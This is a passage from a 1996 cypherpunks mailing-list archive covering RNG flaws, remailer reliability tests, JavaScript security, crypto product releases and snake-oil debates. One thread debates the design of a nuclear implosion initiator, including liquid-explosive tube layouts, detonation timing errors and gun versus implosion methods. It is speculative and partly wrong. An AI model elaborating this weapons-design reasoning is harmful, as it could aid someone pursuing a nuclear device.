>of keys that "aren't random enough" and thus not among the set to be
>considered when trying to break one.

	Quite. It's about like my doing an experiment with randomly selected
groups and deliberately selecting only ones that match my preconcieved notions
of how it's supposed to be. You can do that for things that aren't what one is
looking at (i.e., controlling for stuff), but do it with the _result_ and
you'll be laughed out of any respectable journal in which you try to publish
it.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 23 Feb 1996 08:33:19 +0800
To: frissell@panix.com
Subject: Re: Edupage, 20 Feb 1996
Message-ID: <01I1IS0WU5SAAKTL4K@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"frissell@panix.com"  "Duncan Frissell" 22-FEB-1996 12:01:13.17

>Why, Oh why is there so so much talk about the V Chip.  This stupid device
>only covers over-the-air broadcast TV a dying part of the spectrum.  It does
>not cover cable-only programs (HBO, etc) and it does not cover net-based
>audio and (soon) video programming.  It is meaningless.

	If I recall correctly, Europe still has a lot of over-the-air
broadcast TV. Moreover, if the device works from signals cosent with the TV
broadcast, it could perfectly well work with cable. Indeed, I had thought it
did - the companies that mainly produce stuff for cable seemed to be protesting
it just as much as the broadcast networks.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 23 Feb 1996 08:29:42 +0800
To: lull@acm.org
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <01I1IS42QX3KAKTL4K@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"lull@acm.org" 22-FEB-1996 13:20:54.73

>In any case, throwing away some selected portion of its output is NOT
>an appropriate cure for a broken random number generator.

>The proper cure is fixing the generator.

	If I understand the matter correctly, looking at and sorting out a
given set of outputs is bad. Looking at a sample (that is _not_ used) and
using it to decide how much putting-together (XORing) of the rest to do is OK.
They appear to be doing the former.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Fri, 23 Feb 1996 21:03:47 +0800
To: cypherpunks@toad.com
Subject: Re: Let the Snake Oil Flow
In-Reply-To: <ad5232581a02100494c9@[205.199.118.202]>
Message-ID: <199602230110.RAA11717@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:

 > Predictably, others are asking/expecting "the Cypherpunks"
 > to break their systems. Just as predictably, many of us are
 > patiently (and impatiently) explaining that breakages cost
 > money and resources. And so the "developers" gleefully
 > respond that this proves the "Cyperpunks" [sic] are helpless
 > before their software.

Which is patently silly, of course.  Unless some TLA writes me an
obscenely large check, I am unlikely to try and break anything
that hasn't achieved significant market penetration and
widespread use, whether it is an operating system, or an
application which utilizes encryption.

I'm not even interested in breaking the individual building
blocks of such things, such as block ciphers and RNGs, outside of
the context of their use in a specific application.  Unless
something is obviously braindead on delivery, it makes little
sense to attack it in the abstract, and the nicest weaknesses in
systems often depend upon the little details, as the Netscape and
Kerberos folk have discovered.

All of this means that challenges by the snake oil peddlers, and
even well-advertised public floggings of new ciphers, like RC5,
really don't do much to discover design flaws or weaknesses. It's
like the ten people who post "I have invented an unbreakable
cipher" to sci.crypt each week, and when no one cares, proudly
declare victory and go home.

 > A few highly publicized failures could be educational, and
 > ultimately help to strengthen the Net. You don't get better
 > bridges without some highly-visible bridge collapses. Raises
 > consumer awareness of what good design really is.

Yes - one neat hack against Netscape or Microsoft is worth an
infinite number of dull papers in "Cryptologia" as far as public
relations are concerned.

 > Personally, I'm much more worried about the
 > behind-the-scenes goings on with key escrow, the pressures
 > being applied to Netscape, Lotus, Microsoft, TIS, etc., than
 > I am in Yet Another Clueless Crypto Product (tm).

Let a thousand Clueless Crypto Products bloom today. :)

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wink Junior <winkjr@teleport.com>
Date: Fri, 23 Feb 1996 10:57:04 +0800
To: cypherpunks@toad.com
Subject: Bell Labs' Alternative to Java
Message-ID: <199602230131.RAA26502@kelly.teleport.com>
MIME-Version: 1.0
Content-Type: text


Looks like Java might have some competition.  Perry and others who are
concerned that Java has inherent security flaws might want to get a word
in with the Bell Labs folks while the project is still in development.

Wink

>BELL LABS, RITCHIE "DO SIMPLER RIVAL TO JAVA"
>(February 20th 1995) AT&T Corp's Bell Laboratories is working
>feverishly on a rival to Sun Microsystems Inc's Java, according to
>the San Jose Mercury News. The paper reckons that the project has
>been accorded such a high priority that most of the 10 or so software
>engineers working on the Plan 9 OS have been pulled off that to get
>the new language, code-named Inferno, finished. 
>
>According to Silicon Valley's local paper, Dennis Ritchie, credited
>with creating both Unix and C, made a brief reference to Inferno in a
>speech last Tuesday night at UniForum and was reluctantly persuaded
>to enlarge on it a little later. He said that while Java has been the
>beneficiary of a lot of hype, the underlying idea behind it was
>compelling, but he was worried that Java had become too large and
>complex; he also suggested that any Bell Labs version would be useful
>in a wider variety of machines, including future television sets.
>"Java does not go far enough," he said. 
>
>Ritchie did not say how far along Inferno was, and implied that no
>decision had been made about whether it would ever be brought to
>market as a product. Bell Labs is of course in the early stages of
>moving - not physically but in its allegiance - from AT&T to the
>$20,000m-a-year fledgling Lucent Technologies Inc.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Carl M. Ellison" <cme@acm.org>
Date: Fri, 23 Feb 1996 02:22:48 +0800
To: cypherpunks@toad.com
Subject: cke.html
Message-ID: <9602221744.AA29479@cybercash.com.cybercash.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.tis.com/crypto/cke.html

have you guys checked out this page recently?  It shows TIS's change
to a dual [domestic, international] approach to key recovery.

 - Carl







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Fri, 23 Feb 1996 02:31:32 +0800
To: SINCLAIR DOUGLAS N <sinclai@ecf.toronto.edu>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <96Feb22.110840edt.10494@cannon.ecf.toronto.edu>
Message-ID: <312cab4d.13399722@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 22 Feb 1996 11:08:37 -0500, SINCLAIR DOUGLAS N
<sinclai@ecf.toronto.edu> wrote:

> What they have gained is the knowledge that their random number source
> isn't broken.  If your RNG started spewing 0 bits by the thousand would
> you say "This stream is just as likely as any other stream that I can
> imagine so there is no problem", or "My RNG is broken".  Of course,
> in nice mathematical abstractions your RNG never breaks, but we live in
> a nasty world of thermal failiures and cold solder joints.

No, they really haven't.  Their initial post indicated that they are
throwing away some 50% of their generated sets of "random" data.  This
indicates either their random number generator is seriously broken, or
their analysis of the numbers produced is seriously broken.  Either
way, they have a significant problem which they are NOT addressing.


In any truly random data stream, you would expect a certain percentage
of blocks to have statistics outside whatever you decide is the
"typical" range.  If their generator is producing significantly more
or less than the expected number of "atypical" blocks, it is broken.
If is producing about the expected number of such blocks, it is likely
working as designed, and such blocks are still TRULY random.

In any case, throwing away some selected portion of its output is NOT
an appropriate cure for a broken random number generator.

The proper cure is fixing the generator.


As a separate issue, if your cryptosystem has a set of "weak keys" it
may make sense to screen your random numbers to prevent use of such
weak keys.  This, however, appears not to be what IPG is doing.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmca@alpha.c2.org (Chris McAuliffe)
Date: Fri, 23 Feb 1996 21:03:12 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Easy Nuclear Detonator
Message-ID: <199602230232.SAA14224@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[To: jim bell <jimbell@pacifier.com>]
[Cc: cypherpunks@toad.com]
[Subject: Re: Easy Nuclear Detonator]

In one of his less lucid moments, jim bell <jimbell@pacifier.com> typed:
>I wrote this just a few hours ago.  Let's have a vote:  Who thinks I have
>some idea about the subject?

I think it was a Heinlein character who observed that "you can vote all
you like, it doesn't change reality". The HGTTG also makes a similar
observation regarding the emigrants from Golgafrincham.

The fact that you call for votes at all makes me less inclined to
believe your expostulations.

Chris McAuliffe <cmca@alpha.c2.org> (No, not that one.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMS0aK4HskC9sh/+lAQEqaAQAw7wyEp0eWra32f7xIzdpa5Z+No6WI9Dr
VIklNbXWE/TPTMMBfTtMu0tCiEGQ70tvCp+N3BeSqH9bEI6FCWbOa9XNhhGcAiZT
VQVwGfyUiJW61HkqNqfH/HCgxRJnnA3dNwbNPQ1FJsVvIPT/RBVPGc4K0hoNp5nd
WjDAsFDCQjM=
=dejF
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 23 Feb 1996 09:54:00 +0800
To: cypherpunks@toad.com
Subject: BLO_bak
Message-ID: <199602222336.SAA28235@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   2-22-96. TWP:

   "CIA Can Waive Prohibition Against Using U.S. Clergy Abroad
   for Covert Work."

      A controversial loophole permitting the CIA to recruit
      American journalists as agents also allows the agency to
      waive a similar 19-year-old ban on employing clerics or
      missionaries. An official also disclosed that CIA
      regulations prohibit recruiting employees of members of
      Congress or congressional committees "without the
      approval of the member" for whom they work.

   "The CIA: No Cover For Failure."

      Now we know why the CIA, the NSA and the DIA and all
      those other spook agencies that get $25 billion-plus
      every year can't bring down Saddam Hussein: They have
      not been able to use journalists or priests -- the
      latest the Washington/New York national security
      establishment has come up with to ride out the lean
      years after the Cold War. In a justification for
      continued massive spending on spying, the experts ask us
      to focus on the extraneous and stupid, rather than look
      at the obvious.

   "Again, the CIA and the Press." [Editorial]

   "My Spy Story." [NYT Op-Ed]


   2ND_job (for 4)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 23 Feb 1996 13:53:03 +0800
To: cypherpunks@toad.com
Subject: BLO_bak
Message-ID: <199602222337.SAA28314@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   2-22-96. TWP:

   "CIA Can Waive Prohibition Against Using U.S. Clergy Abroad
   for Covert Work."

      A controversial loophole permitting the CIA to recruit
      American journalists as agents also allows the agency to
      waive a similar 19-year-old ban on employing clerics or
      missionaries. An official also disclosed that CIA
      regulations prohibit recruiting employees of members of
      Congress or congressional committees "without the
      approval of the member" for whom they work.

   "The CIA: No Cover For Failure."

      Now we know why the CIA, the NSA and the DIA and all
      those other spook agencies that get $25 billion-plus
      every year can't bring down Saddam Hussein: They have
      not been able to use journalists or priests -- the
      latest the Washington/New York national security
      establishment has come up with to ride out the lean
      years after the Cold War. In a justification for
      continued massive spending on spying, the experts ask us
      to focus on the extraneous and stupid, rather than look
      at the obvious.

   "Again, the CIA and the Press." [Editorial]

   "My Spy Story." [NYT Op-Ed]


   BLO_bak (for 4)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Robert LoVerso <john@loverso.southborough.ma.us>
Date: Sat, 24 Feb 1996 16:17:12 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: url
In-Reply-To: <199602222059.MAA07863@netcom7.netcom.com>
Message-ID: <199602230016.TAA02237@loverso.southborough.ma.us>
MIME-Version: 1.0
Content-Type: text/plain


> Why Perry, it's called Netscape 1.1N.  :-)

Surely you mean 1.12?

John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Sat, 24 Feb 1996 07:05:15 +0800
To: cypherpunks@toad.com
Subject: Remailers, Feb
Message-ID: <2.2.32.19960223034206.00686e9c@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've just finished my monthly round of type I remailer testing. This test
doesn't include remailers announced after I started; they'll be inclued next
month. (Also coming in March will be tests of at least one other nym server.)


As in January, I sent posts from my PPP account here (at Aracnet, this time,
rather than Teleport) through a given remailer to an account at alpha.c2.org,
then back through the remailer to me. This is, by design, a very different
sort of test than remailer pinging and the like; in the number of hops and
chances for things to go wrong, I think it reflects actual usage much more
closely.

Trip time is the interval from being posted to mail.aracnet.com to arriving
in my mailbox there. All times are given in hours:minutes. Posts were made at
all times of day. Unsurprisingly, those made late at night (particularly in
the midnight-to-6 am range) returned most quickly.

I've included the January figures for comparison persons. I remain curious
about the differences and eager to find an explanation.

REMAILER                        FAILURES    AVERAGE     MINIMUM     MAXIMUM

hfinney@shell.portal.com
    February                    00          00:45       00:35       01:00
    January                     00          00:08       00:02       00:38
hal@alumni.caltech.edu
    February                    00          00:46       00:35       01:00
    January                     00          00:09       00:06       00:12
homer@rahul.net
    February                    00          00:50       00:37       01:08
    January                     00          00:06       00:03       00:14
remailer@utopia.hacktic.nl
    February                    00          01:10       00:47       02:03
    January                     00          00:19       00:03       01:20
remailer@tjava.com
    February                    00          001:47      00:26       05:26
    January                                 not tested
mix@zifi.genetics.utah.edu
    February                    00          01:56       00:31       03:35
    January                                 not tested
remailer@replay.com
    February                    00          03:00       00:51       07:45
    January                     01          00:31       00:13       01:14
remailer@mockingbird.alias.net
    February                    00          03:29       00:56       06:35
    January                                 not tested
mixmaster@vishnu.alias.net
    February                    00          04:29       00:40       11:27
    January                     00          00:56       00:23       02:38
mix@remail.gondolin.org
    February                    00          06:30       00:40       12:52
    January                     08          11:37       03:58       18:36
mixmaster@remailer.obscura.com
    February                    00          06:53       00:55       13:25
    January                     00          02:36      00:23        06:55
remailer@extropia.wimsey.com
    February                    00          09:15       01:35       23:50
    January                     08          01:46       01:19       02:13

amnesia@chardos.connix.com
    February                    10
    January                     10
pamphlet@idiom.com
    February                    10
    January                                 not tested
remail@c2.org
    February                    10
    January                     02          00:52       00:14       03:00
remailer@bi-node.zerberus.de
    February                    10
    January                     00          07:43       00:15       19:54

Mailers reported as down with no expectation of returning:

    hroller@c2.org
    remailer@armadillo.com

Mailers reported as down with some expectation of returning:

    remailer@valhalla.phoenix.net / wmono@spook.alias.net

I'd particularly like to thank the remailer operations who (mostly in private
mail) answered a number of questions of mine.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEPAwUBMS02wn3AXR8sjiylAQEd/gfMD4FdgFNMh69P6nd4xdcPogD26zMi5RwQ
JfraMZqG75ezMq4Z5kr1v5j77vNZZ2Bka5T0mR76TqYSPDzKGturPJNY1bSd7Cbn
xUdpee43uo09+QdVpR/IGPKKjxH8qUhJC4X2WvHDlfTdNRCjItIQF2gkBJPRmknJ
OCnHku/bMBs7sr+7OsQyMwvfQrkxpu3Wh/LYV/+U0vEWnCzFupOHQ9nnu+JSCaUu
naFYlqP6w0Ywl6qeTAvRJPgx+PfVDk4B0WZHnXFi1p9IMDaQ7FysxH1pc2mPkURR
M+rwz1ElfCMoMB4JiF5Y3r1aZAf9ES2HLz1sTcueji2S/g==
=O4Sc
-----END PGP SIGNATURE-----

-- 
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 23 Feb 1996 21:04:36 +0800
To: jim bell <jimbell@pacifier.com>
Subject: [Off topic] Re: Easy Nuclear Detonator
In-Reply-To: <m0tpUBd-00098SC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960222191429.9687A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



Way off topic, still....

On Wed, 21 Feb 1996, jim bell wrote:

> At 10:56 PM 2/21/96 -0500, Black Unicorn wrote:
> >On Sun, 18 Feb 1996, jim bell wrote:

[easy nuclear initiation device described, key in design are:]

> >> 
> >> "Multiple very thin flexible hollow tubes (1 mm ID? teflon?) filled with a
> >> homogenous liquid 
> >> explosive (for example, pure nitromethane)

To which I reply:

> >This method is so dependent on the uniformity of the initiator (the cap 
> >in this instance) as to be nearly useless.  Normal blasting caps do not 
> >detonate with the uniformity required to initiate each of the tube paths 
> >at the same time.  In the off chance that you contemplated surrounding 
> >the cap with liquid explosive of a sufficent type, (which still wouldn't 
> >assure proper uniformity with any certainty as the liquid explosive is as 
> >likely to detonate slightly off left to right as up to down) you still have 
> >extremely difficult problems to overcome.
> 
> Re-read my whole statement.  I copy the relevant commentary that you
> sloppily forgot to read:
> 
> >> Detonated from a single cap, with an 
> >> intermediary chamber of liquid explosive to stabilize the shock front,

You, quite inadvertantly I am sure, managed to ignore the following:

> >In the off chance that you contemplated surrounding
> >the cap with liquid explosive of a sufficent type, (which still wouldn't
> >assure proper uniformity with any certainty as the liquid explosive is as
> >likely to detonate slightly off left to right as up to down) you still 
> >have extremely difficult problems to overcome.

And thus boast:

> I already entirely anticipated your objection.  And destroyed it.

Actually, your design still is vulnerable to my objection, as my 
objection was specifically to your intermediary chamber concept.

Your intermediary chamber, if surrounding the blasting cap, is likely to 
detonate to one side first, at a right angle to the axis of the chamber 
to the explosive assembly.  Blasting caps tend to rupture their casings 
on one side before the other.  In this case you will have a left to right 
detonation in the intermediary chamber, as I indicated.  If you have your 
tubes spun off the chamber like a starfish, your initiation times will 
vary, probably significantly.  In the worst case, the duration determined 
by diameter of chamber/velocity of detonation.  In the event your chamber 
is 1/5 of the length of the tubes themselves, you will have one side of 
your explosive assembly detonating when another tube has 1/5 a length to 
go.  As you have not specified any of the dimentions of your chamber or 
tubes, or the exact liquid explosive you intend to use, the delay is 
impossible to quantify exactly.  Attempting to mitigate the delay by 
shortening the tubes brings the explosive assembly closer to the 
intermediary chamber, with associated hazards.  Most problematic, 
disruption of the reflector orientations.

Also note, that if starfished, the worst possible timing error will 
occur, that being, the tubes with the most extreme difference in 
initiation time will be those at opposite poles of the quasi-sphere of 
the explosive assembly.  Bad news for uniform compression.

If you intend to run the intermediary chamber into a funnel before 
seperating into your individual tubes, you have the same problem as if 
you never had a chamber at all, namely the initiation of one or the other 
tubes before the rest.  While the funnel may limit the effect of radial 
differences in initiation timing, it complicates things by requiring 
very precise milling of the connections of the tubes to the intermediary 
chamber as well as such milling at the ends which meet your explosive 
assembly.

> >1>  Interference from the milling shape and accuracy of the openings to 
> >the tubes containing the liquid explosive.
> 
> Quantify, quantify.  How much of a problem?

Clever question given that I am without any information as to the exact 
shape of your tubes, if they are bowled down towards the explosive 
assembly, or what their exact width (excepting your vague 1mm figure) 
might be.  You make some guesses as to material, but these two are fairly 
flimsy even by your own admission.

All you need to realize to appreciate the problem is that if you do not 
have a precisely milled end, with a precise depth into the compressing high 
explosive outer face, you have differences in how and when the various 
faces of the explosive assembly are going to initiate.  If you make your 
tubes narrow, it becomes very hard to mill the ends of your tubes, and if 
you widen the tubes, it exagerates the distortive effect of 
irregularities in the tube ends.

It's very simple, if you don't have a precisely flat end of tube, you 
have a shaped charge in effect.  On the other end, you have problems with 
easy of initiation.

  (Hint:  If you seriously 
> believed there was a problem with this idea, you would be able to give a few 
> examples on how to avoid them.  Reading your commentary, you did none of 
> this.  

I'm not in the business of designing nuclear initiators.  I expose poorly 
thought out explosive engineering as a hobby.  Your best solution is to 
mill each tube exactly alike, right down the the degree of bend and slope 
of arc as well as shape of either end.  But you could have figured that 
out without me spelling it our for you.

> >2>  Mild to obscure impurities in the liquid explosives causing 
> >differences in velocity with respect to other tubes. 
> 
> All the tubes can be filled at the last minute by pulling a vacuum on the
> system and letting atmospheric pressure fill all the tubes.  No impurities,
> or at least it's a perfectly homogeneous mixture.

Hard to prevent with a hydrazine explosive.  Hydrazine based explosives 
may vary as much as 10-15% in velocity of detonation with mere .1% 
changes in pressure and 1% changes in temp.  I don't know how impurity 
comes into play exactly, but I suspect they are very sensitive to such 
changes as well.

> > Even small changes 
> >in pressures within the tubes might cause enough timing problems to make 
> >uniform initiation of the primary high explosive assembly impossible.
> 
> "might"?  Well, could you be more specific?  How many nanoseconds would be
> too many?

What is the mass of your subcritial material?  What shape are you using?  
Simple sphere or multifaceted polygon?  What is the thickness of your 
compressive explosive?  What kind of explosive is it?  How deep are the 
initiators inserted into the compressive explosive?  What is the material 
of your tubes?  Glass or metalic?  (Metalic will be force conductive 
before failure, glass will merely shatter, the difference in initiation 
points in the compressive explosive will be equal to the depth of the 
tubes when comparing glass and metalic tubes.  Glass is likely to 
initiatite at the surface, metalic tubes at the point of tube terminus.

> >3>  Interference from the milling shape and accuracy of the terminus of 
> >the tubes containing the liquid explosive.
> 
> So what's your point?

You might have signifincantly different characteristics in the initiation 
of your compressive explosive.  As I said before, anything but a 
precisely milled flat end on your tubes will effectively be a shaped charge.
The effects of various shapes at the ends of tubes are left as an 
exercise for the reader.

> >4>  Overpressure in the device causing premature detonation of the near 
> >portion of the high explosive assembly.
> 
> Sure about that?

Quite.  It was a big problem in the first compressive devices.  Some 
early experimentation produced mushroom like shapes in the compressed 
material (inert for experimentation) because one side of the compressive 
explosive was initiated by presure of the impact of the casing itself.  
Supercriticality would not have been achieved in these instances of 
failure.
  
Further experimentation attempted to rectify the problem by placing the 
entire inner chamber at .25 of an atmosphere.  I think their eventual 
solution got around overpressure initiation in a simplier way, but I 
don't recall what it was.  (Might have been new explosives for the 
compression phase)

> 
> >All of these might cause enough timing error to prevent uniform pressure 
> >and thus prevent uniform compression and make supercriticality impossible.
> 
> Pigs might fly.

But they don't.  The timing problem is quite significant.  Why do you 
think high speed and superaccurate switches are so well guarded?  There 
isn't an easy grassroots substitute, if there were, the switches would be 
fairly useless.

> >Remember, kryonic switiches are necessary even when dealing with the 
> >speeds of electric conductivity.  The velocities of even hydrazine based 
> >explosives are signigicantly lower.  The margin for error is similarly lower.
> 
> How low?  Be specific.

Again, I don't know what your dimentions are.  Hydrazine explosives tend 
to detonate around 8500-10000 m/s.  The speed of transmission of electric 
impulses through a given conductive medium is certainly much higher.

> >Plutonium gun is still the easiest method for the home grown nuclear 
> >device, even if it requires more fissile material.
> 
> The "gun" design wasn't used with the plutonium, because IT WOULD NOT HAVE 
> WORKED! "Fat Man," the bomb dropped on Nagasaki, used the implosion method.  
> "Little Boy," the gun-method bomb, used U-235.   Plutonium detonates far too 
> rapidly to use the "gun" method.   The 
> scientists knew that in 1945.  You seem to be at least 50 years behind the 
> times.

You are correct this time.  My fault.  Uranium should have been in there.  
Typo on my part.  Doesn't change the fact that it's much easier as an initiator.

> Sheesh!  I guess we now know what field YOU don't know about, huh?  Or, 
> perhaps more likely, this is a specific DIS-information campaign.   You want 
> someone to waste a critical-mass worth of plutonium.   

Hey, be my guest.  If you had a critical mass worth of plutonium you're 
playing around with the wrong list, and, I might add, wasting your time 
with anything but the black market for the material.

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 23 Feb 1996 21:07:30 +0800
To: m5@dev.tivoli.com (Mike McNally)
Subject: I'd like a decaf, please (was Today's JavaScript bug)
In-Reply-To: <9602221938.AA17154@alpha>
Message-ID: <199602230109.UAA12579@homeport.org>
MIME-Version: 1.0
Content-Type: text



| At <URL:http://www.osf.org/~loverso/javascript/track-me.html> find
| some interesting "surveillance" applications of Javascript.

	I pointed to a need for configurability for Livescript in
December (http://www.homeport.org/~adam/java.html).  Now, it seems
that Javascript a bigger security hole than Java.  We can turn off
Java, but only downgrade to version 1 to avoid Javascript.

	The problems in Javascript are due to (in no particular order)
lack of design for security, lack of configurability, lack of
authentication in scripts, and a lack of control over whose scripts
are run.

	A design for security would have compartmentalized Javascript,
so that it only ran with access to the browser main window.  It would
not have access to the screen, nor to disk, or memory owned by
Netscape, except where parts of Netscape *explicitly grant* access to
JavaScript.

	Configurability means Netscape OBEYS /etc/netscaperc,
/usr/lib/netscape/security.cf, or some other file that allows me to
turn off Java and JavaScript completely, as a security officer for a
company.  It would also accept restrictions from a gateway or proxy,
which could add http and or headers such as <JAVA=off> and
<Javascript=off> (and perhaps others.)

	Configurability also means that Java or Javascripts can be
made, in a sitewide manner, to ask permission to run, announce
themselves when running, log themselves, (source, output,
interactions, etc), not do things such as shrink below a certain size,
etc.

	The next needed feature is strong cryptographic authentication
in the Java/JS engines, such that only digitally signed scripts can
run.   Again, the site needs to be able to configure this, to say
'Only scripts signed by the Dalai Lama or Perry Metzger can run at
all.  Only scripts signed by Perry and the bank security officer can
get at my e-wallet.'

	The start of this is not complex.  Create a set of standard
headers that http-gw or other web proxies can add, so people behind a
firewall can have sitewide policies.  (Notice that this has the clever
effect of making locally written scripts runnable, since they don't
pass through the firewall, even if all we get is an on/OFF switch.)

	Add authentication services at several (site configurable)
levels.  Digital signatures, one time run tokens are easy to do.
They're not even that tough to do right.  (One time tokens would be
nice for meter-ware as well).



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 23 Feb 1996 18:52:34 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Let the Snake Oil Flow
In-Reply-To: <ad5232581a02100494c9@[205.199.118.202]>
Message-ID: <199602230422.UAA12375@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	All valid points, but when the likes of Nathaniel Borenstein &
his cohorts use the failures of snake oil to discredit all
cryptography, then we have a problem. (Not to say that Netscape is
selling snake oil... but I figure that FV would capitalize on a snake
oil failure to further their anti-cryptography agenda just as they
have used the Netscape RNG bug)

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 23 Feb 1996 18:53:54 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Let the Snake Oil Flow
In-Reply-To: <ad5285b81e0210042b99@[205.199.118.202]>
Message-ID: <199602230438.UAA14284@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Please don't misunderstand...I'm not _approving_ of snake oil, just
> suggesting that maybe the list shouldn't go into paroxysms every time
> someone reveals their Captain Midnight Decoder Ring crypto system.

	Right. it's a tough call though. Suppose the list didn't go
into paroxysms and someone lost big by using snake oil. Then our
friends at FV will say "oh look at this crypto which lost people
money". -- and we did nothing to prevent that opportunity.
	I'm not saying that paroxysms are -good-, just that one should
be wary of the consequences of what may happen if someone loses big to
snake oil.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Briggs <72124.3234@compuserve.com>
Date: Fri, 23 Feb 1996 11:13:42 +0800
To: cypherpunks@toad.com
Subject: Puffer 2.0 Released
Message-ID: <199602230155.UAA23263@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

FOR IMMEDIATE RELEASE                          Information Contact:
                                               Kent Briggs
February 22, 1996                              (817) 666-7737
                                               kbriggs@execpc.com
                                               CIS: 72124,3234


           NEW RELEASE OF WINDOWS ENCRYPTION UTILITY

Hewitt, Texas - Kent Briggs, author of Puffer, has announced the
release of version 2.0 of the popular shareware encryption utility.
Puffer is a password-based data file and e-mail encryption program
for Windows.  Encryption software allows users to keep their
personal, business, and electronic transmitted data private.

New for version 2.0 is the addition of a very fast stream cipher,
PC1.  PC1 operates with a 40-bit encryption key and produces the
same stream output as RC4, the most secure encryption technology
allowed for export from the United States.  Puffer retains the
160-bit Blowfish block cipher in the registered version provided
to customers in the U.S. and Canada.

Puffer's revamped interface features a tabbed-notebook layout and
a new built-in text editor.  Users can now encrypt and decrypt data
and e-mail directly from disk files, the editor, or the Windows
clipboard.  An LZ77 data compression option is also available.  The
ability to produce ASCII, binary, and self-extracting archives is
also retained in version 2.0.

New data wiping features have been added to Puffer to prevent
sensitive data from being unerased on your disk drive.  In addition
to wiping data files, Puffer now has options to wipe file slack and
unused disk space.  The user can select from one to seven random
stream passes for each wipe operation.  A separate DOS utility is
provided to securely wipe the contents of the Windows permanent swap
file.

The shareware version (PUFF20.ZIP, 368K) can be downloaded directly
from the author's web site at http://execpc.com/~kbriggs


- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMS0emCoZzwIn1bdtAQGMCwF5AYfneePdqO96gzCDNZYB6doioAtAMOh4
K/V0mZ5vx/b8xOj1SIsc/Zy0Z95UlFXx
=JWRm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 23 Feb 1996 21:07:27 +0800
To: cypherpunks@toad.com
Subject: Bell Labs' Alternative to Java
Message-ID: <199602230157.UAA03547@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


March BYTE has an article on the Plan 9 OS, by Paul Fillinich, 
a marketing manager at AT&T, pp. 143-44.


He credits "researchers Rob Pike, Dave Presotto, Ken Thompson, 
